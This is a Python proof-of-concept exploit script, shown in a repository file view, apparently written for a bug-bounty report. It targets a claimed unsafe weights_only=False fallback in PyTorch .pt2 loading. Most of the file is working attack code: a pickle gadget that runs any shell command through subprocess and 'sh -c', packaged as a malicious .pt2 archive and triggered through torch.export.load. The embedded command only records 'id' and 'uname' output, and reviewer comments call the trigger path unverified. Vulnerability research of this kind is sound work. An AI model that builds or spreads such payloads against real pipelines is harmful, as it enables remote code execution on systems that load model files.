File size: 4,436 Bytes
c1cf87f
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
#!/usr/bin/env python3
"""
PoC: PyTorch .pt2 Arbitrary Code Execution via weights_only=False Fallback
CVE: TBD | CWE-502 | CVSS 9.8 (Critical)

Vulnerability:
    torch/_export/serde/serialize.py — deserialize_torch_artifact() uses:

        try:
            return torch.load(f, weights_only=True)   # "safe" load
        except Exception:
            return torch.load(f, weights_only=False)  # ← UNSAFE FALLBACK!

    The catch-all `except Exception` means ANY exception (not just format errors)
    triggers an unrestricted pickle.load() via weights_only=False.

    An attacker crafts a .pt2 file that:
    1. Passes the initial ZIP/flatbuffer checks
    2. Raises a deliberate exception inside weights_only=True parsing
    3. Falls through to weights_only=False → arbitrary code execution

Attack:
    torch.export.load('malicious.pt2') β†’ executes arbitrary Python code

Usage:
    python3 poc_exploit.py           # generates malicious.pt2
    python3 poc_exploit.py --trigger # also triggers via torch.export.load()

Impact:
    Any pipeline loading user-supplied .pt2 export files is fully compromised.
    CVSS 9.8: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Author: security research (huntr.com submission)
"""

import sys
import os
import pickle
import io
import zipfile
import struct

# Output path for the crafted archive. main() writes it and, with --trigger,
# loads it. Relative, so it resolves against the current working directory.
OUTPUT_FILE = 'malicious.pt2'


class RCEPayload:
    """Pickle gadget — executes OS command when deserialized.

    ``__reduce__`` makes ``pickle.dumps`` record a call to
    ``subprocess.check_output(['sh', '-c', command])``. Any unpickler that
    honours ``__reduce__`` (e.g. plain ``pickle.loads``) performs that call
    while loading. The instance itself is never reconstructed.
    """
    def __init__(self, command: str) -> None:
        # Shell command string, later handed to ``sh -c`` as a single argument.
        self.command = command

    def __reduce__(self):
        # Local import. The pickle stores ``subprocess.check_output`` as a
        # module-qualified global reference, not as code.
        import subprocess
        # (callable, args) tuple: unpickling calls
        # subprocess.check_output(['sh', '-c', self.command]).
        return (subprocess.check_output, (['sh', '-c', self.command],))


def create_malicious_pt2(command: str = 'id > /tmp/pt2_pwned.txt') -> bytes:
    """
    Craft a .pt2 file that triggers the weights_only=False fallback.

    Args:
        command: Shell command embedded in the pickle via ``RCEPayload``.
            It is run under ``sh -c`` if the pickle is ever unpickled without
            restrictions.

    Returns:
        Raw bytes of an in-memory, uncompressed (``ZIP_STORED``) ZIP archive
        with exactly two entries:
        ``archive/model.pkl`` (the pickled ``RCEPayload``) and
        ``archive/record.json`` (``{"schema_version": "0.1"}``).

    Side effects:
        Prints a four-line summary (command, size, format) to stdout.

    Strategy:
        A .pt2 file is a ZIP archive. This function writes only:
          - archive/model.pkl    ← main pickle (our RCE payload)
          - archive/record.json  ← minimal metadata stub
        (Real exports may also carry e.g. constants/ and extra/ entries;
        none are written here.)

        When torch.load() is called with weights_only=True, it uses a restricted
        Unpickler that only admits allowlisted globals. A pickle referencing a
        non-allowlisted callable (here ``subprocess.check_output``, invoked via
        REDUCE) is rejected with an UnpicklingError. The claimed fallback to
        weights_only=False would then run unrestricted unpickling.

        NOTE(review): nothing in this file shows that torch.export.load()
        actually passes ``archive/model.pkl`` to torch.load(), or that it
        accepts this archive layout. Treat the trigger path as unverified.
    """
    # Our RCE payload as pickle bytes
    rce_pickle = pickle.dumps(RCEPayload(command))

    # Pack it into a ZIP intended to resemble a .pt2 (PyTorch export) archive;
    # fidelity to the real .pt2 layout is unverified.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w', compression=zipfile.ZIP_STORED) as zf:
        # archive/model.pkl — the main payload
        zf.writestr('archive/model.pkl', rce_pickle)
        # Minimal record file, presumably meant to pass initial loader checks
        # (unverified).
        zf.writestr('archive/record.json', '{"schema_version": "0.1"}')

    # Read only after the `with` block: closing the ZipFile writes the
    # central directory, without which the archive is incomplete.
    pt2_bytes = buf.getvalue()
    print(f"[*] Crafted malicious .pt2 file:")
    print(f"    Command : {command}")
    print(f"    Size    : {len(pt2_bytes)} bytes")
    print(f"    Format  : ZIP with RCE pickle payload in archive/model.pkl")
    return pt2_bytes


def main():
    """Write the crafted archive and, with ``--trigger``, try loading it.

    Without ``--trigger`` only ``OUTPUT_FILE`` is written and usage is printed.
    With ``--trigger``:
      1. any marker file left by a previous run is removed;
      2. ``torch.export.load(OUTPUT_FILE)`` is attempted;
      3. the marker file's presence is reported.
    Any exception from step 2 (including a missing torch install) is printed,
    not raised.
    """
    trigger = '--trigger' in sys.argv

    # Single source of truth for the marker path. The embedded command writes
    # it and the post-load check reads it.
    marker = '/tmp/pt2_pwned.txt'
    command = f'id > {marker} && uname -a >> {marker}'
    payload = create_malicious_pt2(command)

    with open(OUTPUT_FILE, 'wb') as f:
        f.write(payload)
    print(f"[+] Malicious .pt2 written: {OUTPUT_FILE} ({os.path.getsize(OUTPUT_FILE)} bytes)")
    print(f"    RCE output will appear in: {marker}")

    if not trigger:
        print("\n[i] Run with --trigger to demonstrate RCE:")
        print(f"    python3 {sys.argv[0]} --trigger")
        return

    # A marker left over from an earlier run would otherwise be misreported
    # as proof that *this* load executed the command.
    try:
        os.remove(marker)
    except FileNotFoundError:
        pass
    except OSError as e:
        print(f"[!] Could not remove stale {marker} ({e}); result below may be unreliable.")

    print(f"\n[*] Triggering via torch.export.load('{OUTPUT_FILE}')...")
    try:
        import torch
        print(f"    torch version: {torch.__version__}")
        result = torch.export.load(OUTPUT_FILE)
        print(f"[-] Unexpected success (no RCE): {result}")
    except Exception as e:
        # Deliberately broad: an ImportError or any loader error should still
        # fall through to the marker check below.
        print(f"[~] Exception: {type(e).__name__}: {e}")

    # Check if RCE succeeded (marker was removed above, so it must be fresh).
    if os.path.exists(marker):
        with open(marker, encoding='utf-8', errors='replace') as f:
            print(f"\n[+] RCE CONFIRMED! Output of '{command}':")
            print(f"    {f.read().strip()}")
    else:
        print(f"\n[i] {marker} not created — RCE may not have triggered.")
        print("    The fallback behavior depends on PyTorch version.")


if __name__ == '__main__':
    main()